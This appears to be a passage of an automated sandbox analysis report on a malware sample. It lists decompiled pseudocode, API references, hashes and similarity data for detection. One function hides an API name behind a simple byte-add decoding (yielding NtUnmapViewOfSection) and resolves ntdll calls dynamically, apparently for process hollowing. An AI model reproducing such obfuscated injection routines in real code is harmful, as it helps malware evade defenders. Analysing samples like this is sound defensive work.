Uniqueness

Uniqueness Score: 100.00%

Function 00410547, Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 98
UNIQUE

Download Yara Rule

C-Code - Quality: 97%

			E00410547(void* __ebx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a20) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v34;
				signed int _v36;
				signed int _v38;
				short _v40;
				short _v42;
				signed int _v44;
				signed int _v46;
				short _v48;
				short _v50;
				char _v52;
				short _t27;
				short _t28;
				short _t29;
				void* _t32;
				signed int _t33;
				void* _t36;
				char* _t42;
				char* _t45;
				void* _t46;
				short _t47;
				signed int _t48;
				signed int _t49;
				signed int _t52;
				signed int _t53;
				void* _t54;

				_t46 = __ebx;
				_t27 = 0x6e;
				_v52 = _t27;
				_t28 = 0x74;
				_t47 = 0x64;
				_t52 = 0x6c;
				_v50 = _t28;
				_t29 = 0x2e;
				_v42 = _t29;
				_v34 = 0;
				_v48 = _t47;
				_v46 = _t52;
				_v44 = _t52;
				_v40 = _t47;
				_v38 = _t52;
				_v36 = _t52;
				_t32 = E00410813(_t52,  &_v52);
				_t48 =  *0x419908; // 0x0
				_t54 = _t32;
				_t49 = _t48 |  *0x41990c;
				_t53 = _t52;
				if(_t49 == 0) {
					_v28 = 0x553c5b35;
					_t13 =  &_v28; // 0x553c5b35
					_t42 = _t13;
					_v24 = 0x3d574854;
					_v20 = 0x365e4c50;
					_v16 = 0x4a4c3a4d;
					_v12 = 0x5556505b;
					_v8 = _t49;
					do {
						 *_t42 =  *_t42 + 0x19;
						_t42 = _t42 + 1;
						_t59 =  *_t42;
					} while ( *_t42 != 0);
					_t19 =  &_v28; // 0x553c5b35
					 *0x419908 = E00410936(_t52, _t59, _t54, _t53, _t19);
					_t45 =  &_v28;
					 *0x41990c = _t52;
					if(_v28 != 0) {
						do {
							 *_t45 =  *_t45 + 0xe7;
							_t45 = _t45 + 1;
						} while ( *_t45 != 0);
					}
				}
				_t33 =  *0x419910; // 0x0
				_t62 = _t33 |  *0x419914;
				if((_t33 |  *0x419914) == 0) {
					 *0x419910 = E00410936(_t52, _t62, _t54, _t53, "NtClose");
					 *0x419914 = _t52;
				}
				_t36 =  *((intOrPtr*)(E004010BB(_t46, 1, 0xd89ad05)))();
				asm("cdq");
				E00410B1A( *0x419908,  *0x41990c, 2, _t36, _t52, _a4);
				E00410B1A( *0x419910,  *0x419914, 1, _a12, _a16, _a8);
				CloseHandle(_a20);
				return 0;
			}

0x00410547
0x00410551
0x00410554
0x00410558
0x0041055b
0x0041055e
0x0041055f
0x00410565
0x00410566
0x0041056c
0x00410573
0x00410577
0x0041057b
0x0041057f
0x00410583
0x00410587
0x0041058b
0x00410590
0x00410596
0x00410598
0x0041059e
0x004105a0
0x004105a2
0x004105a9
0x004105a9
0x004105ac
0x004105b3
0x004105ba
0x004105c1
0x004105c8
0x004105cb
0x004105cb
0x004105ce
0x004105cf
0x004105cf
0x004105d4
0x004105e3
0x004105e8
0x004105eb
0x004105f1
0x004105f3
0x004105f3
0x004105f6
0x004105f7
0x004105f3
0x004105f1
0x004105fc
0x00410601
0x00410607
0x00410615
0x0041061a
0x0041061a
0x0041062e
0x00410633
0x00410647
0x00410660
0x0041066b
0x00410678

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

CloseHandle.KERNEL32(?), ref: 0041066B

Strings

[PVU, xrefs: 004105C1
PL^6, xrefs: 004105B3
M:LJ, xrefs: 004105BA
NtClose, xrefs: 00410609
THW=, xrefs: 004105AC
5[<U, xrefs: 004105A9

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: CloseHandleLibraryLoad
String ID: 5[<U$M:LJ$NtClose$PL^6$THW=$[PVU
API String ID: 3761054133-4160772593
Opcode ID: 1af09206f56acbadc0a80f3ab34ec26a07c0f3412a70cf7f4a99e10a3568b3c6
Instruction ID: a8832ed3a85e36ccb4b9f50cca738ecbe9549743f5a70bfc9ff8fe3141ecac0a
Opcode Fuzzy Hash: 1af09206f56acbadc0a80f3ab34ec26a07c0f3412a70cf7f4a99e10a3568b3c6
Instruction Fuzzy Hash: A831E3B1910248BEDF10DFA0DD11AEE7BB5FF59710F00802AE514A72A1E3B51A80CBAD

Uniqueness

Uniqueness Score: 100.00%

Function 00403850, Relevance: 10.6, APIs: 7, Instructions: 92
UNIQUE

Download Yara Rule

C-Code - Quality: 83%

			E00403850(void* __ebx, void* __edx, void* __edi, void* __ebp, signed int* _a4) {
				char* _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				char* _v48;
				char _v52;
				char _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v76;
				char* _v88;
				char _v92;
				char _v96;
				char _v100;
				signed int _v104;
				signed int _v108;
				intOrPtr _v116;
				char* _v128;
				char _v132;
				char _v136;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v156;
				char* _v168;
				char _v172;
				char _v176;
				char _v180;
				signed int _v184;
				signed int _v188;
				unsigned int _v192;
				signed int _v196;
				void* __esi;
				void* _t134;
				void* _t141;
				void* _t148;
				void* _t155;
				void* _t162;
				signed int _t165;
				void* _t176;
				signed int _t181;
				signed int _t182;
				void* _t187;
				signed int _t192;
				signed int _t193;
				void* _t198;
				signed int _t203;
				signed int _t204;
				void* _t209;
				signed int _t214;
				signed int _t215;
				void* _t220;
				signed int _t225;
				signed int _t226;
				intOrPtr _t228;
				signed int _t230;
				signed int _t232;
				signed int _t234;
				signed int _t236;
				signed int* _t244;
				signed int* _t247;
				signed int* _t250;
				signed int* _t253;
				signed int* _t256;
				unsigned int _t258;
				signed int _t261;
				void* _t282;
				signed int _t289;
				signed int _t291;
				signed int _t293;
				signed int _t295;
				signed int _t297;
				intOrPtr* _t305;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				signed int* _t315;
				signed int* _t328;
				intOrPtr _t330;
				intOrPtr _t332;
				intOrPtr _t334;
				intOrPtr _t336;
				void* _t343;
				void* _t344;
				void* _t346;
				void* _t347;
				void* _t349;
				void* _t350;
				void* _t352;
				void* _t353;
				void* _t355;
				void* _t356;
				void* _t358;
				void* _t366;

				_t282 = __edx;
				_t344 = _t343 - 0x18;
				_push(__ebp);
				E0041339D( &_v16, 0);
				_t289 =  *0x44c7e8; // 0x0
				_t228 =  *0x44c810; // 0x0
				_v28 = _t228;
				if(_t289 == 0) {
					E0041339D( &_v20, _t289);
					_t366 =  *0x44c7e8 - _t289; // 0x0
					if(_t366 == 0) {
						_t225 =  *0x44d448; // 0x2
						_t226 = _t225 + 1;
						 *0x44d448 = _t226;
						 *0x44c7e8 = _t226;
					}
					E004133F5( &_v20);
					_t289 =  *0x44c7e8; // 0x0
				}
				_t328 = _a4;
				_t244 = _a4;
				if(_t289 >=  *((intOrPtr*)(_t244 + 0xc))) {
					_t305 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t305 =  *((intOrPtr*)( *((intOrPtr*)(_t244 + 8)) + _t289 * 4));
					if(_t305 != 0) {
						L16:
						E004133F5( &_v16);
						return _t305;
					} else {
						L8:
						if( *((char*)(_t244 + 0x14)) == 0) {
							L11:
							if(_t305 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t220 = E00413DB2();
							if(_t289 >=  *((intOrPtr*)(_t220 + 0xc))) {
								L12:
								if(_t228 == 0) {
									_t134 = E004098D0(_t282,  &_v24, _t328);
									_t346 = _t344 + 8;
									__eflags = _t134 - 0xffffffff;
									if(__eflags == 0) {
										asm("xorps xmm0, xmm0");
										_v12 = 0x4375b4;
										asm("movq [esp+0x24], xmm0");
										_v8 = "bad cast";
										E00416C8D( &_v12, 0x446bf8);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t347 = _t346 - 0x18;
										_push(_t228);
										_push(_t328);
										_push(_t305);
										_push(_t289);
										E0041339D( &_v56, 0);
										_t291 =  *0x44c7fc; // 0x2
										_t230 =  *0x44c760; // 0x294a90
										_v68 = _t230;
										__eflags = _t291;
										if(_t291 == 0) {
											E0041339D( &_v60, _t291);
											__eflags =  *0x44c7fc - _t291; // 0x2
											if(__eflags == 0) {
												_t214 =  *0x44d448; // 0x2
												_t215 = _t214 + 1;
												__eflags = _t215;
												 *0x44d448 = _t215;
												 *0x44c7fc = _t215;
											}
											E004133F5( &_v60);
											_t291 =  *0x44c7fc; // 0x2
										}
										_t330 = _v36;
										_t247 = _a4;
										__eflags = _t291 -  *((intOrPtr*)(_t247 + 0xc));
										if(_t291 >=  *((intOrPtr*)(_t247 + 0xc))) {
											_t307 = 0;
											__eflags = 0;
											goto L26;
										} else {
											_t307 =  *( *((intOrPtr*)(_t247 + 8)) + _t291 * 4);
											__eflags = _t307;
											if(_t307 != 0) {
												L34:
												E004133F5( &_v56);
												return _t307;
											} else {
												L26:
												__eflags =  *((char*)(_t247 + 0x14));
												if( *((char*)(_t247 + 0x14)) == 0) {
													L29:
													__eflags = _t307;
													if(_t307 != 0) {
														goto L34;
													} else {
														goto L30;
													}
												} else {
													_t209 = E00413DB2();
													__eflags = _t291 -  *((intOrPtr*)(_t209 + 0xc));
													if(_t291 >=  *((intOrPtr*)(_t209 + 0xc))) {
														L30:
														__eflags = _t230;
														if(_t230 == 0) {
															_t141 = E00409950(_t282, _t307, _t330,  &_v64, _t330);
															_t349 = _t347 + 8;
															__eflags = _t141 - 0xffffffff;
															if(__eflags == 0) {
																asm("xorps xmm0, xmm0");
																_v52 = 0x4375b4;
																asm("movq [esp+0x24], xmm0");
																_v48 = "bad cast";
																E00416C8D( &_v52, 0x446bf8);
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_t350 = _t349 - 0x18;
																_push(_t230);
																_push(_t330);
																_push(_t307);
																_push(_t291);
																E0041339D( &_v96, 0);
																_t293 =  *0x44d468; // 0x1
																_t232 =  *0x44c800; // 0x290de8
																_v108 = _t232;
																__eflags = _t293;
																if(_t293 == 0) {
																	E0041339D( &_v100, _t293);
																	__eflags =  *0x44d468 - _t293; // 0x1
																	if(__eflags == 0) {
																		_t203 =  *0x44d448; // 0x2
																		_t204 = _t203 + 1;
																		__eflags = _t204;
																		 *0x44d448 = _t204;
																		 *0x44d468 = _t204;
																	}
																	E004133F5( &_v100);
																	_t293 =  *0x44d468; // 0x1
																}
																_t332 = _v76;
																_t250 = _a4;
																__eflags = _t293 -  *((intOrPtr*)(_t250 + 0xc));
																if(_t293 >=  *((intOrPtr*)(_t250 + 0xc))) {
																	_t309 = 0;
																	__eflags = 0;
																	goto L44;
																} else {
																	_t309 =  *( *((intOrPtr*)(_t250 + 8)) + _t293 * 4);
																	__eflags = _t309;
																	if(_t309 != 0) {
																		L52:
																		E004133F5( &_v96);
																		return _t309;
																	} else {
																		L44:
																		__eflags =  *((char*)(_t250 + 0x14));
																		if( *((char*)(_t250 + 0x14)) == 0) {
																			L47:
																			__eflags = _t309;
																			if(_t309 != 0) {
																				goto L52;
																			} else {
																				goto L48;
																			}
																		} else {
																			_t198 = E00413DB2();
																			__eflags = _t293 -  *((intOrPtr*)(_t198 + 0xc));
																			if(_t293 >=  *((intOrPtr*)(_t198 + 0xc))) {
																				L48:
																				__eflags = _t232;
																				if(_t232 == 0) {
																					_t148 = E004099F0(_t282,  &_v104, _t332);
																					_t352 = _t350 + 8;
																					__eflags = _t148 - 0xffffffff;
																					if(__eflags == 0) {
																						asm("xorps xmm0, xmm0");
																						_v92 = 0x4375b4;
																						asm("movq [esp+0x24], xmm0");
																						_v88 = "bad cast";
																						E00416C8D( &_v92, 0x446bf8);
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						_t353 = _t352 - 0x18;
																						_push(_t232);
																						_push(_t332);
																						_push(_t309);
																						_push(_t293);
																						E0041339D( &_v136, 0);
																						_t295 =  *0x44c7f4; // 0x0
																						_t234 =  *0x44c814; // 0x0
																						_v148 = _t234;
																						__eflags = _t295;
																						if(_t295 == 0) {
																							E0041339D( &_v140, _t295);
																							__eflags =  *0x44c7f4 - _t295; // 0x0
																							if(__eflags == 0) {
																								_t192 =  *0x44d448; // 0x2
																								_t193 = _t192 + 1;
																								__eflags = _t193;
																								 *0x44d448 = _t193;
																								 *0x44c7f4 = _t193;
																							}
																							E004133F5( &_v140);
																							_t295 =  *0x44c7f4; // 0x0
																						}
																						_t334 = _v116;
																						_t253 = _a4;
																						__eflags = _t295 -  *((intOrPtr*)(_t253 + 0xc));
																						if(_t295 >=  *((intOrPtr*)(_t253 + 0xc))) {
																							_t311 = 0;
																							__eflags = 0;
																							goto L62;
																						} else {
																							_t311 =  *( *((intOrPtr*)(_t253 + 8)) + _t295 * 4);
																							__eflags = _t311;
																							if(_t311 != 0) {
																								L70:
																								E004133F5( &_v136);
																								return _t311;
																							} else {
																								L62:
																								__eflags =  *((char*)(_t253 + 0x14));
																								if( *((char*)(_t253 + 0x14)) == 0) {
																									L65:
																									__eflags = _t311;
																									if(_t311 != 0) {
																										goto L70;
																									} else {
																										goto L66;
																									}
																								} else {
																									_t187 = E00413DB2();
																									__eflags = _t295 -  *((intOrPtr*)(_t187 + 0xc));
																									if(_t295 >=  *((intOrPtr*)(_t187 + 0xc))) {
																										L66:
																										__eflags = _t234;
																										if(_t234 == 0) {
																											_t155 = E00409A80(_t282,  &_v144, _t334);
																											_t355 = _t353 + 8;
																											__eflags = _t155 - 0xffffffff;
																											if(__eflags == 0) {
																												asm("xorps xmm0, xmm0");
																												_v132 = 0x4375b4;
																												asm("movq [esp+0x24], xmm0");
																												_v128 = "bad cast";
																												E00416C8D( &_v132, 0x446bf8);
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												_t356 = _t355 - 0x18;
																												_push(_t234);
																												_push(_t334);
																												_push(_t311);
																												_push(_t295);
																												E0041339D( &_v176, 0);
																												_t297 =  *0x44c7f8; // 0x0
																												_t236 =  *0x44c818; // 0x0
																												_v188 = _t236;
																												__eflags = _t297;
																												if(_t297 == 0) {
																													E0041339D( &_v180, _t297);
																													__eflags =  *0x44c7f8 - _t297; // 0x0
																													if(__eflags == 0) {
																														_t181 =  *0x44d448; // 0x2
																														_t182 = _t181 + 1;
																														__eflags = _t182;
																														 *0x44d448 = _t182;
																														 *0x44c7f8 = _t182;
																													}
																													E004133F5( &_v180);
																													_t297 =  *0x44c7f8; // 0x0
																												}
																												_t336 = _v156;
																												_t256 = _a4;
																												__eflags = _t297 - _t256[3];
																												if(_t297 >= _t256[3]) {
																													_t313 = 0;
																													__eflags = 0;
																													goto L80;
																												} else {
																													_t313 =  *(_t256[2] + _t297 * 4);
																													__eflags = _t313;
																													if(_t313 != 0) {
																														L88:
																														E004133F5( &_v176);
																														return _t313;
																													} else {
																														L80:
																														__eflags = _t256[5];
																														if(_t256[5] == 0) {
																															L83:
																															__eflags = _t313;
																															if(_t313 != 0) {
																																goto L88;
																															} else {
																																goto L84;
																															}
																														} else {
																															_t176 = E00413DB2();
																															__eflags = _t297 -  *((intOrPtr*)(_t176 + 0xc));
																															if(_t297 >=  *((intOrPtr*)(_t176 + 0xc))) {
																																L84:
																																__eflags = _t236;
																																if(_t236 == 0) {
																																	_t162 = E00409B00(_t282,  &_v184, _t336);
																																	_t358 = _t356 + 8;
																																	__eflags = _t162 - 0xffffffff;
																																	if(__eflags == 0) {
																																		asm("xorps xmm0, xmm0");
																																		_v172 = 0x4375b4;
																																		asm("movq [esp+0x24], xmm0");
																																		_v168 = "bad cast";
																																		E00416C8D( &_v172, 0x446bf8);
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		_push(_t313);
																																		_t315 = _t256;
																																		_t165 = E0041500C(_t282, __eflags, 0x24);
																																		__eflags = _t165;
																																		if(_t165 == 0) {
																																			_t165 = 0;
																																			__eflags = 0;
																																		} else {
																																			 *((intOrPtr*)(_t165 + 4)) = 0x14;
																																			 *((intOrPtr*)(_t165 + 8)) = 0;
																																			 *((intOrPtr*)(_t165 + 0xc)) = 0;
																																			 *((intOrPtr*)(_t165 + 0x10)) = 0;
																																			 *_t165 = 0x437540;
																																			 *((intOrPtr*)(_t165 + 0x18)) = 0;
																																			 *((intOrPtr*)(_t165 + 0x1c)) = 0;
																																			 *((intOrPtr*)(_t165 + 0x20)) = 0;
																																		}
																																		_t258 = _v192;
																																		 *_t315 = _t165;
																																		_t315[1] = _t165;
																																		_t315[3] = _v196;
																																		_t315[2] = _t258;
																																		_t315[4] =  !(_t258 >> 3) & 0x00000100;
																																		_t261 =  !(_t258 >> 9) & 0x00000004;
																																		__eflags = _t261;
																																		_t315[5] = _t261;
																																		return _t315;
																																	} else {
																																		_t313 = _v184;
																																		 *0x44c818 = _t313;
																																		 *((intOrPtr*)( *_t313 + 4))();
																																		E00413D84(__eflags, _t313);
																																		_t356 = _t358 + 4;
																																		goto L88;
																																	}
																																} else {
																																	E004133F5( &_v176);
																																	return _t236;
																																}
																															} else {
																																_t313 =  *( *((intOrPtr*)(_t176 + 8)) + _t297 * 4);
																																goto L83;
																															}
																														}
																													}
																												}
																											} else {
																												_t311 = _v144;
																												 *0x44c814 = _t311;
																												 *((intOrPtr*)( *_t311 + 4))();
																												E00413D84(__eflags, _t311);
																												_t353 = _t355 + 4;
																												goto L70;
																											}
																										} else {
																											E004133F5( &_v136);
																											return _t234;
																										}
																									} else {
																										_t311 =  *( *((intOrPtr*)(_t187 + 8)) + _t295 * 4);
																										goto L65;
																									}
																								}
																							}
																						}
																					} else {
																						_t309 = _v104;
																						 *0x44c800 = _t309;
																						 *((intOrPtr*)( *_t309 + 4))();
																						E00413D84(__eflags, _t309);
																						_t350 = _t352 + 4;
																						goto L52;
																					}
																				} else {
																					E004133F5( &_v96);
																					return _t232;
																				}
																			} else {
																				_t309 =  *( *((intOrPtr*)(_t198 + 8)) + _t293 * 4);
																				goto L47;
																			}
																		}
																	}
																}
															} else {
																_t307 = _v64;
																 *0x44c760 = _t307;
																 *((intOrPtr*)( *_t307 + 4))();
																E00413D84(__eflags, _t307);
																_t347 = _t349 + 4;
																goto L34;
															}
														} else {
															E004133F5( &_v56);
															return _t230;
														}
													} else {
														_t307 =  *( *((intOrPtr*)(_t209 + 8)) + _t291 * 4);
														goto L29;
													}
												}
											}
										}
									} else {
										_t305 = _v24;
										 *0x44c810 = _t305;
										 *((intOrPtr*)( *_t305 + 4))();
										E00413D84(__eflags, _t305);
										_t344 = _t346 + 4;
										goto L16;
									}
								} else {
									E004133F5( &_v16);
									return _t228;
								}
							} else {
								_t305 =  *((intOrPtr*)( *((intOrPtr*)(_t220 + 8)) + _t289 * 4));
								goto L11;
							}
						}
					}
				}
			}

0x00403850
0x00403850
0x00403854
0x0040385d
0x00403862
0x00403868
0x0040386e
0x00403874
0x0040387b
0x00403880
0x00403886
0x00403888
0x0040388d
0x0040388e
0x00403893
0x00403893
0x0040389c
0x004038a1
0x004038a1
0x004038a7
0x004038ab
0x004038b1
0x004038bf
0x004038bf
0x00000000
0x004038b3
0x004038b6
0x004038bb
0x00403921
0x00403925
0x00403933
0x004038bd
0x004038c1
0x004038c5
0x004038d7
0x004038d9
0x00000000
0x00000000
0x00000000
0x00000000
0x004038c7
0x004038c7
0x004038cf
0x004038db
0x004038dd
0x004038fa
0x004038ff
0x00403902
0x00403905
0x00403934
0x00403937
0x00403948
0x0040394f
0x00403957
0x0040395c
0x0040395d
0x0040395e
0x0040395f
0x00403960
0x00403963
0x00403964
0x00403965
0x00403966
0x0040396d
0x00403972
0x00403978
0x0040397e
0x00403982
0x00403984
0x0040398b
0x00403990
0x00403996
0x00403998
0x0040399d
0x0040399d
0x0040399e
0x004039a3
0x004039a3
0x004039ac
0x004039b1
0x004039b1
0x004039b7
0x004039bb
0x004039be
0x004039c1
0x004039cf
0x004039cf
0x00000000
0x004039c3
0x004039c6
0x004039c9
0x004039cb
0x00403a31
0x00403a35
0x00403a43
0x004039cd
0x004039d1
0x004039d1
0x004039d5
0x004039e7
0x004039e7
0x004039e9
0x00000000
0x00000000
0x00000000
0x00000000
0x004039d7
0x004039d7
0x004039dc
0x004039df
0x004039eb
0x004039eb
0x004039ed
0x00403a0a
0x00403a0f
0x00403a12
0x00403a15
0x00403a44
0x00403a47
0x00403a58
0x00403a5f
0x00403a67
0x00403a6c
0x00403a6d
0x00403a6e
0x00403a6f
0x00403a70
0x00403a73
0x00403a74
0x00403a75
0x00403a76
0x00403a7d
0x00403a82
0x00403a88
0x00403a8e
0x00403a92
0x00403a94
0x00403a9b
0x00403aa0
0x00403aa6
0x00403aa8
0x00403aad
0x00403aad
0x00403aae
0x00403ab3
0x00403ab3
0x00403abc
0x00403ac1
0x00403ac1
0x00403ac7
0x00403acb
0x00403ace
0x00403ad1
0x00403adf
0x00403adf
0x00000000
0x00403ad3
0x00403ad6
0x00403ad9
0x00403adb
0x00403b41
0x00403b45
0x00403b53
0x00403add
0x00403ae1
0x00403ae1
0x00403ae5
0x00403af7
0x00403af7
0x00403af9
0x00000000
0x00000000
0x00000000
0x00000000
0x00403ae7
0x00403ae7
0x00403aec
0x00403aef
0x00403afb
0x00403afb
0x00403afd
0x00403b1a
0x00403b1f
0x00403b22
0x00403b25
0x00403b54
0x00403b57
0x00403b68
0x00403b6f
0x00403b77
0x00403b7c
0x00403b7d
0x00403b7e
0x00403b7f
0x00403b80
0x00403b83
0x00403b84
0x00403b85
0x00403b86
0x00403b8d
0x00403b92
0x00403b98
0x00403b9e
0x00403ba2
0x00403ba4
0x00403bab
0x00403bb0
0x00403bb6
0x00403bb8
0x00403bbd
0x00403bbd
0x00403bbe
0x00403bc3
0x00403bc3
0x00403bcc
0x00403bd1
0x00403bd1
0x00403bd7
0x00403bdb
0x00403bde
0x00403be1
0x00403bef
0x00403bef
0x00000000
0x00403be3
0x00403be6
0x00403be9
0x00403beb
0x00403c51
0x00403c55
0x00403c63
0x00403bed
0x00403bf1
0x00403bf1
0x00403bf5
0x00403c07
0x00403c07
0x00403c09
0x00000000
0x00000000
0x00000000
0x00000000
0x00403bf7
0x00403bf7
0x00403bfc
0x00403bff
0x00403c0b
0x00403c0b
0x00403c0d
0x00403c2a
0x00403c2f
0x00403c32
0x00403c35
0x00403c64
0x00403c67
0x00403c78
0x00403c7f
0x00403c87
0x00403c8c
0x00403c8d
0x00403c8e
0x00403c8f
0x00403c90
0x00403c93
0x00403c94
0x00403c95
0x00403c96
0x00403c9d
0x00403ca2
0x00403ca8
0x00403cae
0x00403cb2
0x00403cb4
0x00403cbb
0x00403cc0
0x00403cc6
0x00403cc8
0x00403ccd
0x00403ccd
0x00403cce
0x00403cd3
0x00403cd3
0x00403cdc
0x00403ce1
0x00403ce1
0x00403ce7
0x00403ceb
0x00403cee
0x00403cf1
0x00403cff
0x00403cff
0x00000000
0x00403cf3
0x00403cf6
0x00403cf9
0x00403cfb
0x00403d61
0x00403d65
0x00403d73
0x00403cfd
0x00403d01
0x00403d01
0x00403d05
0x00403d17
0x00403d17
0x00403d19
0x00000000
0x00000000
0x00000000
0x00000000
0x00403d07
0x00403d07
0x00403d0c
0x00403d0f
0x00403d1b
0x00403d1b
0x00403d1d
0x00403d3a
0x00403d3f
0x00403d42
0x00403d45
0x00403d74
0x00403d77
0x00403d88
0x00403d8f
0x00403d97
0x00403d9c
0x00403d9d
0x00403d9e
0x00403d9f
0x00403da0
0x00403da3
0x00403da5
0x00403dad
0x00403daf
0x00403dea
0x00403dea
0x00403db1
0x00403db1
0x00403db8
0x00403dbf
0x00403dc6
0x00403dcd
0x00403dd3
0x00403dda
0x00403de1
0x00403de1
0x00403dec
0x00403df0
0x00403df2
0x00403df9
0x00403dfe
0x00403e10
0x00403e13
0x00403e13
0x00403e16
0x00403e1c
0x00403d47
0x00403d47
0x00403d4d
0x00403d55
0x00403d59
0x00403d5e
0x00000000
0x00403d5e
0x00403d1f
0x00403d25
0x00403d33
0x00403d33
0x00403d11
0x00403d14
0x00000000
0x00403d14
0x00403d0f
0x00403d05
0x00403cfb
0x00403c37
0x00403c37
0x00403c3d
0x00403c45
0x00403c49
0x00403c4e
0x00000000
0x00403c4e
0x00403c0f
0x00403c15
0x00403c23
0x00403c23
0x00403c01
0x00403c04
0x00000000
0x00403c04
0x00403bff
0x00403bf5
0x00403beb
0x00403b27
0x00403b27
0x00403b2d
0x00403b35
0x00403b39
0x00403b3e
0x00000000
0x00403b3e
0x00403aff
0x00403b05
0x00403b13
0x00403b13
0x00403af1
0x00403af4
0x00000000
0x00403af4
0x00403aef
0x00403ae5
0x00403adb
0x00403a17
0x00403a17
0x00403a1d
0x00403a25
0x00403a29
0x00403a2e
0x00000000
0x00403a2e
0x004039ef
0x004039f5
0x00403a03
0x00403a03
0x004039e1
0x004039e4
0x00000000
0x004039e4
0x004039df
0x004039d5
0x004039cb
0x00403907
0x00403907
0x0040390d
0x00403915
0x00403919
0x0040391e
0x00000000
0x0040391e
0x004038df
0x004038e5
0x004038f3
0x004038f3
0x004038d1
0x004038d4
0x00000000
0x004038d4
0x004038cf
0x004038c5
0x004038bb

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040385D
std::_Lockit::_Lockit.LIBCPMT ref: 0040387B
std::_Lockit::~_Lockit.LIBCPMT ref: 0040389C
std::_Lockit::~_Lockit.LIBCPMT ref: 004038E5

Part of subcall function 004098D0: new.LIBCMT ref: 004098EA

std::_Facet_Register.LIBCPMT ref: 00403919

Part of subcall function 00413D84: new.LIBCMT ref: 00413D8A

std::_Lockit::~_Lockit.LIBCPMT ref: 00403925
__CxxThrowException@8.LIBVCRUNTIME ref: 00403957

Part of subcall function 00416C8D: KiUserExceptionDispatcher.NTDLL(?,?,0041371A,?,00000008,?,1FFFFFFF,?,?,?,?,0041371A,?,00447D68,?), ref: 00416CEC

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::~_$Lockit::_$DispatcherExceptionException@8Facet_RegisterThrowUser
String ID:
API String ID: 2318137220-0
Opcode ID: 9fa69de5fe5dd7a4ce2aba1f539ed49e55f237007999c16e67061ceb56bd7882
Instruction ID: 226dbcd1c6e74eb51603a58d78827cbf0ac5179b4f3ec27cbba94f52d41e1082
Opcode Fuzzy Hash: 9fa69de5fe5dd7a4ce2aba1f539ed49e55f237007999c16e67061ceb56bd7882
Instruction Fuzzy Hash: 1D310676500301CBD310EF08D88145ABBE8EF95325F1845BFF850A32A1DB38BE85CB9A

Uniqueness

Uniqueness Score: 100.00%

Function 00403960, Relevance: 10.6, APIs: 7, Instructions: 92
UNIQUE

Download Yara Rule

C-Code - Quality: 84%

			E00403960(void* __ebx, void* __edx, void* __edi, void* __ebp, signed int* _a4) {
				char* _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				char* _v48;
				char _v52;
				char _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v76;
				char* _v88;
				char _v92;
				char _v96;
				char _v100;
				signed int _v104;
				signed int _v108;
				intOrPtr _v116;
				char* _v128;
				char _v132;
				char _v136;
				char _v140;
				signed int _v144;
				signed int _v148;
				unsigned int _v152;
				signed int _v156;
				void* __esi;
				void* _t111;
				void* _t118;
				void* _t125;
				void* _t132;
				signed int _t135;
				void* _t146;
				signed int _t151;
				signed int _t152;
				void* _t157;
				signed int _t162;
				signed int _t163;
				void* _t168;
				signed int _t173;
				signed int _t174;
				void* _t179;
				signed int _t184;
				signed int _t185;
				intOrPtr _t187;
				signed int _t189;
				signed int _t191;
				signed int _t193;
				signed int* _t200;
				signed int* _t203;
				signed int* _t206;
				signed int* _t209;
				unsigned int _t211;
				signed int _t214;
				void* _t231;
				signed int _t237;
				signed int _t239;
				signed int _t241;
				signed int _t243;
				intOrPtr* _t250;
				signed int _t252;
				signed int _t254;
				signed int _t256;
				signed int* _t258;
				signed int* _t269;
				intOrPtr _t271;
				intOrPtr _t273;
				intOrPtr _t275;
				void* _t281;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t287;
				void* _t288;
				void* _t290;
				void* _t291;
				void* _t293;
				void* _t300;

				_t231 = __edx;
				_t282 = _t281 - 0x18;
				_push(__ebp);
				E0041339D( &_v16, 0);
				_t237 =  *0x44c7fc; // 0x2
				_t187 =  *0x44c760; // 0x294a90
				_v28 = _t187;
				if(_t237 == 0) {
					E0041339D( &_v20, _t237);
					_t300 =  *0x44c7fc - _t237; // 0x2
					if(_t300 == 0) {
						_t184 =  *0x44d448; // 0x2
						_t185 = _t184 + 1;
						 *0x44d448 = _t185;
						 *0x44c7fc = _t185;
					}
					E004133F5( &_v20);
					_t237 =  *0x44c7fc; // 0x2
				}
				_t269 = _a4;
				_t200 = _a4;
